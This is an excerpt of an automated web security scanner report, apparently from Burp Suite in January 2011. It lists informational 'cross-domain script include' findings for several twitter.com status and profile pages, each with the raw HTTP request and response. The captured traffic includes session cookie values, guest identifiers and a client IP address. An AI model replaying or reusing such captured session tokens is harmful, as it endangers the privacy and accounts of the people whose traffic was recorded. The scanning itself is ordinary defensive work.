Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDQ0Mjg0MjI0MTM3NjI1NjoVaW5fbmV3X3VzZXJfZmxvdzA6DGNz%250AcmZfaWQiJWFiYzQ1NWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9u%250AYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--143307db8c75b48669ad669d208411d3b8844eb3; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.495. http://twitter.com/malsup/status/30442842241376256 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/30442842241376256

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/status/30442842241376256 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225100-10-9359
ETag: "d3ba17c903de7d4c4bec8cb1904cd217"
Last-Modified: Fri, 28 Jan 2011 14:31:40 GMT
X-Runtime: 0.06637
Content-Type: text/html; charset=utf-8
Content-Length: 13586
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDQ0Mjg0MjI0MTM3NjI1NjoMY3NyZl9pZCIlMTZhNzJmNDdiNmFl%250ANTdhNjQ5NDJlNGE1ZTdlOWViNWI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--f98f0ce1b37e7ecbf5ecb2ea52d936a1c830361d; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.496. http://twitter.com/malsup/status/30772839023910912 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/30772839023910912

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/status/30772839023910912 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:06:27 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234387-96677-18464
ETag: "a56910b62beca5c75c9cd3388e52e3cd"
Last-Modified: Fri, 28 Jan 2011 17:06:27 GMT
X-Runtime: 0.05312
Content-Type: text/html; charset=utf-8
Content-Length: 13610
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDc3MjgzOTAyMzkxMDkxMjoVaW5fbmV3X3VzZXJfZmxvdzA6DGNz%250AcmZfaWQiJWFiYzQ1NWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9u%250AYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--ee3096bc63bd1d2f783e5f5c057e9459f04c996a; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.497. http://twitter.com/malsup/status/30772839023910912 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/30772839023910912

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/status/30772839023910912 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224740-93635-34868
ETag: "78f139df4c6b6f726d8cd49448048d35"
Last-Modified: Fri, 28 Jan 2011 14:25:40 GMT
X-Runtime: 0.08978
Content-Type: text/html; charset=utf-8
Content-Length: 13741
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDc3MjgzOTAyMzkxMDkxMjoMY3NyZl9pZCIlMzZjNjQyMjZiMjdi%250AYjEyMDg4ZmU0MGQ3MWFlM2M3M2I6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--31a7ec0c01289e70c33472c98a7cbc57bf724c53; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.498. http://twitter.com/malsup/status/30791740717801472 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/30791740717801472

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/status/30791740717801472 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225099-36426-16387
ETag: "bbfd230855643c7c5c801dcb171724e2"
Last-Modified: Fri, 28 Jan 2011 14:31:39 GMT
X-Runtime: 0.04229
Content-Type: text/html; charset=utf-8
Content-Length: 13835
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDc5MTc0MDcxNzgwMTQ3MjoMY3NyZl9pZCIlNmUxODZiNjU4ZTgy%250ANDYyNTRlZTg4ODZmNjJjNmU4NGQ6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lk%250AIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AAA%253D%253D--15f2d85b856d1bb3a3b44fb108277df0186a6b99; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.499. http://twitter.com/malsup/status/30791740717801472 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/30791740717801472

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/status/30791740717801472 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:41 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224740-47255-25269
ETag: "d4aa7ab8b414958eeafd252d48c7544d"
Last-Modified: Fri, 28 Jan 2011 14:25:40 GMT
X-Runtime: 0.05744
Content-Type: text/html; charset=utf-8
Content-Length: 13835
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDc5MTc0MDcxNzgwMTQ3MjoMY3NyZl9pZCIlM2ViNDhhMTdlMDQx%250AMTNkNjM4ZWNjZjJjNzM1YzRhNGI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--57098155f97d7c28fdd3d7868ba2f1b52affaed0; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.500. http://twitter.com/malsup/status/30791740717801472 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/malsup/status/30791740717801472

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903
http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903
http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903
http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /malsup/status/30791740717801472 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:06:26 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234386-33465-9256
ETag: "269a2ca9b120a76fba83c788224974bd"
Last-Modified: Fri, 28 Jan 2011 17:06:26 GMT
X-Runtime: 0.06699
Content-Type: text/html; charset=utf-8
Content-Length: 13703
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjdodHRwOi8vdHdpdHRlci5jb20vbWFsc3VwL3N0%250AYXR1cy8zMDc5MTc0MDcxNzgwMTQ3MjoVaW5fbmV3X3VzZXJfZmxvdzA6DGNz%250AcmZfaWQiJWFiYzQ1NWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9u%250AYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3%250ANGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxh%250Ac2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8Mwt%250AAQ%253D%253D--89f1fca28c083a40501fe8165cbadc608af527f1; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.501. http://twitter.com/mariamenounos previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/mariamenounos

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726
http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726
http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726
http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:21 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266001-12668-52676
ETag: "dfd5f78ed0c4ed8b98562bddfee9b7e2"
Last-Modified: Sat, 29 Jan 2011 01:53:21 GMT
X-Runtime: 0.01149
Content-Type: text/html; charset=utf-8
Content-Length: 49303
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
